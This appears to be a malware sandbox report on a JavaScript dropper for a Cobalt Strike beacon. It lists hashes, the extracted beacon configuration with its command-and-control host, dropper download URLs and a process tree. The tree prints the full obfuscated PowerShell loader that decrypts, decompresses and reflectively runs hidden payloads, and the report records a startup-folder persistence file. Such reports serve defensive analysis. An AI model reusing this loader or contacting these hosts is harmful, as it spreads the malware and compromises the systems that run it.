cobaltstrike | ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
11-04-2024 01:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24.js
Size

718KB
MD5

6c0c25445827a1bb55a7b7a53a2173e0
SHA1

2e34cc5a0e8d276b5288f4ba493bf36e26d7d51c
SHA256

ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24
SHA512

fa974a3ff032cacf4072eed7ad4def358fabb8d186b5c9b0b50f85c2fd9b337a9c29c5cda0a853abcce9042f7bce8a8f2b991870e9892f4ba51be8b22166f451
SSDEEP

384:CqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbVqbW:5mmmmmmmmmmmmmmmmmmW

Score

10^/10

cobaltstrike 666 backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://store3.gofile.io/download/direct/e63cd175-a3bf-4fbc-87b6-8c237ace143e/hays_compiled_files.pdf

exe.dropper

https://store3.gofile.io/download/direct/55478873-a42c-46f8-b63b-60c5031fa485/vad.cmd

Extracted

Family

cobaltstrike

Botnet

666

http://samsunguniverse.com:443/wp-content/unsalted-condensed-soups/

Attributes

access_type
512
beacon_type
2048
dns_idle
6.7372036e+07
dns_sleep
8.1297408e+08
host
samsunguniverse.com,/wp-content/unsalted-condensed-soups/
http_header1
AAAACgAAAF1BY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL2F2aWYsaW1hZ2Uvd2VicCwqLyo7cT0wLjgAAAAKAAAAH0FjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjUAAAAKAAAAIkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZSwgYnIAAAAKAAAAFkNvbm5lY3Rpb246IGtlZXAtYWxpdmUAAAAHAAAAAAAAAA8AAAANAAAAAQAAAAkvc291cC5naWYAAAAMAAAAAAAAAA==
http_header2
AAAACgAAAB5Db250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb24AAAAKAAAAEUNvbm5lY3Rpb246IGNsb3NlAAAABwAAAAAAAAAPAAAACAAAAAYAAAAOQXV0aGVudGljYXRpb24AAAAHAAAAAQAAAAMAAAACAAAATXsiaW1hZ2VfdXJsIiA6ICJodHRwOi8vbWVtZXNtaXgubmV0L21lZGlhL2NyZWF0ZWQvam9vd2RqLmpwZyIsICJhdXRoZGF0YSIgOiAiAAAAAQAAAAIifQAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
http_method1
GET
http_method2
POST
jitter
7680
maxdns
235
polling_time
60000
port_number
443
sc_process32
%windir%\syswow64\dfrgui.exe
sc_process64
%windir%\sysnative\dfrgui.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCF4otg7PLqPK9DRHSRAWCg2RQ4hXLImgcCXikvdf4N9sFBrpIEQsznrImUwv+9q+7voFNWL8Kh+mkeF+bGKcQCczSXFkKpPYvwwOEQeT8lPfiFAkT/eNHDuZY/xrjA4VMmgBRM3qvPbgi9lCPfOowsx6njNPJIeuQufRDk7p5u5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
3.154317312e+09
unknown2
AAAABAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAADAAAAACAAAAMAAAAAIAAAAwAAAAAgAAACwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
uri
/imagedata/
user_agent
Mozilla/5.0 (X11; CrOS x86_64 13597.94.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.186 Safari/537.36
watermark
666

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Blocklisted process makes network request 2 IoCs

Processes:

wscript.exepowershell.exe

flow pid process

3 4660 wscript.exe
10 4728 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation wscript.exe
Drops startup file 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command.lnk powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5736 1228 WerFault.exe powershell.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5776 timeout.exe

flow	pid	process
3	4660	wscript.exe
10	4728	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	wscript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command.lnk	powershell.exe

pid	pid_target	process	target process
5736	1228	WerFault.exe	powershell.exe

pid	process
5776	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

powershell.exemsedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exemsedge.exe

pid	process
4728	powershell.exe
4728	powershell.exe
428	msedge.exe
428	msedge.exe
4904	msedge.exe
4904	msedge.exe
4728	powershell.exe
4728	powershell.exe
4728	powershell.exe
540	identity_helper.exe
540	identity_helper.exe
1228	powershell.exe
1228	powershell.exe
1228	powershell.exe
1800	powershell.exe
1800	powershell.exe
1800	powershell.exe
5220	msedge.exe
5220	msedge.exe
5220	msedge.exe
5220	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

Processes:

msedge.exe

pid process

4904 msedge.exe
4904 msedge.exe
4904 msedge.exe
4904 msedge.exe
4904 msedge.exe
4904 msedge.exe
4904 msedge.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4728 powershell.exe
Token: SeDebugPrivilege 1228 powershell.exe
Token: SeDebugPrivilege 1800 powershell.exe

description	pid	process
Token: SeDebugPrivilege	4728	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe
4904	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

wscript.exepowershell.exemsedge.exe

description	pid	process	target process
PID 4660 wrote to memory of 4728	4660	wscript.exe	powershell.exe
PID 4660 wrote to memory of 4728	4660	wscript.exe	powershell.exe
PID 4728 wrote to memory of 4904	4728	powershell.exe	msedge.exe
PID 4728 wrote to memory of 4904	4728	powershell.exe	msedge.exe
PID 4904 wrote to memory of 4764	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4764	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 1568	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 428	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 428	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe
PID 4904 wrote to memory of 4792	4904	msedge.exe	msedge.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ad2af4ead09dc2445069b262e9d0d297f187ed3b1b1d9754fd1fa536768b4d24.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\hays_compiled_files.pdf
3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9bdcb46f8,0x7ff9bdcb4708,0x7ff9bdcb4718
4⤵
PID:4764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
4⤵
PID:1568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8
4⤵
PID:4792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
4⤵
PID:3540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
4⤵
PID:4756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:1
4⤵
PID:868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=4292 /prefetch:6
4⤵
PID:3264

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
4⤵
PID:2512

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
4⤵
PID:4548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
4⤵
PID:2932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
4⤵
PID:2512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
4⤵
PID:4444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,15342638354442216767,6148106013328420693,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3856 /prefetch:2
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5220

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\command.cmd"
3⤵
PID:1576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\command.cmd
4⤵
PID:836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\command.cmd';$NpTc='ElPDuQePDuQmPDuQePDuQnPDuQtAPDuQtPDuQ'.Replace('PDuQ', ''),'CoXPYZpyXPYZToXPYZ'.Replace('XPYZ', ''),'CrEMSSeaEMSStEMSSeDEMSSecEMSSrEMSSypEMSStoEMSSrEMSS'.Replace('EMSS', ''),'DeBhMIcoBhMImBhMIpreBhMIsBhMIsBhMI'.Replace('BhMI', ''),'MjUaaaijUaanMjUaaodujUaaljUaaejUaa'.Replace('jUaa', ''),'CCTRRhaCTRRnCTRRgCTRReECTRRxteCTRRnsCTRRioCTRRnCTRR'.Replace('CTRR', ''),'ReUTwVaUTwVdUTwVLUTwVinUTwVesUTwV'.Replace('UTwV', ''),'GeAhBRtAhBRCuAhBRrAhBRrAhBRentAhBRPrAhBRocAhBRessAhBR'.Replace('AhBR', ''),'FricxOoicxOmBicxOaseicxO6icxO4icxOSicxOtricxOingicxO'.Replace('icxO', ''),'TpxparapxpansfpxpaopxparmFpxpainpxpaapxpalBpxpalopxpacpxpakpxpa'.Replace('pxpa', ''),'SBHHKpBHHKliBHHKtBHHK'.Replace('BHHK', ''),'EnJJQstJJQsryJJQsPoiJJQsntJJQs'.Replace('JJQs', ''),'LoaFmxRdFmxR'.Replace('FmxR', ''),'InrHcCvrHcCokerHcC'.Replace('rHcC', '');powershell -w hidden;function HrNbd($IYBxP){$sIDrs=[System.Security.Cryptography.Aes]::Create();$sIDrs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$sIDrs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$sIDrs.Key=[System.Convert]::($NpTc[8])('YlLuUQlq2zooTkmMvubkG6nmi6eEQu+hG3qKzUo3LiI=');$sIDrs.IV=[System.Convert]::($NpTc[8])('5WjxBcRpNDZeOHu0UleMXg==');$auMon=$sIDrs.($NpTc[2])();$sLVMy=$auMon.($NpTc[9])($IYBxP,0,$IYBxP.Length);$auMon.Dispose();$sIDrs.Dispose();$sLVMy;}function DWPGe($IYBxP){$eIWUL=New-Object System.IO.MemoryStream(,$IYBxP);$RadhF=New-Object System.IO.MemoryStream;$iIZvs=New-Object System.IO.Compression.GZipStream($eIWUL,[IO.Compression.CompressionMode]::($NpTc[3]));$iIZvs.($NpTc[1])($RadhF);$iIZvs.Dispose();$eIWUL.Dispose();$RadhF.Dispose();$RadhF.ToArray();}$zaBiQ=[System.IO.File]::($NpTc[6])([Console]::Title);$zusSU=DWPGe (HrNbd ([Convert]::($NpTc[8])([System.Linq.Enumerable]::($NpTc[0])($zaBiQ, 5).Substring(2))));$FxKCT=DWPGe (HrNbd ([Convert]::($NpTc[8])([System.Linq.Enumerable]::($NpTc[0])($zaBiQ, 6).Substring(2))));[System.Reflection.Assembly]::($NpTc[12])([byte[]]$FxKCT).($NpTc[11]).($NpTc[13])($null,$null);[System.Reflection.Assembly]::($NpTc[12])([byte[]]$zusSU).($NpTc[11]).($NpTc[13])($null,$null); "
5⤵
PID:3060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 2756
6⤵
- Program crash
PID:5736

C:\Windows\system32\timeout.exe
timeout /nobreak /t 1
5⤵
- Delays execution with timeout.exe
PID:5776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4312

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1228 -ip 1228
1⤵
PID:5712

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
e1b45169ebca0dceadb0f45697799d62

SHA1
803604277318898e6f5c6fb92270ca83b5609cd5

SHA256
4c0224fb7cc26ccf74f5be586f18401db57cce935c767a446659b828a7b5ee60

SHA512
357965b8d5cfaf773dbd9b371d7e308d1c86a6c428e542adbfe6bac34a7d2061d0a2f59e84e5b42768930e9b109e9e9f2a87e95cf26b3a69cbff05654ee42b4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
9ffb5f81e8eccd0963c46cbfea1abc20

SHA1
a02a610afd3543de215565bc488a4343bb5c1a59

SHA256
3a654b499247e59e34040f3b192a0069e8f3904e2398cbed90e86d981378e8bc

SHA512
2d21e18ef3f800e6e43b8cf03639d04510433c04215923f5a96432a8aa361fdda282cd444210150d9dbf8f028825d5bc8a451fd53bd3e0c9528eeb80d6e86597

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
9a58cc9ef5899fc362abe2d35611dbed

SHA1
b1e688f44a2db18edc82c45816f13516673bdfb6

SHA256
68dbaa0b1e4969d425cd0dceef7b24a55f3492a00a98418ca52ca2e668da9268

SHA512
4989bbd467f729f9b0728cc09dd451463b0f191748cd0fa49202f1c92642cb80f73a3ff0bb5af7d4a2df0453369dc817742d43b598fe5b82cf5b357a4837561a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
07864350659c24bf2bd446577c45ebf8

SHA1
92ce91edc35f9303f19dcc0ffc1ad3451ba5094d

SHA256
50efabbef8bc0160b0aefba0123a30fa372a015af43ff67ecb2c6a2632fc32ae

SHA512
cbdf2c56335478174b050cb4872fab417fc4a7fbeef091b619b7d1b6eb889224ac58c92b48dbc9bdb598fc159c3a8ff1986c40ea36889899726dafc494ab5d50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
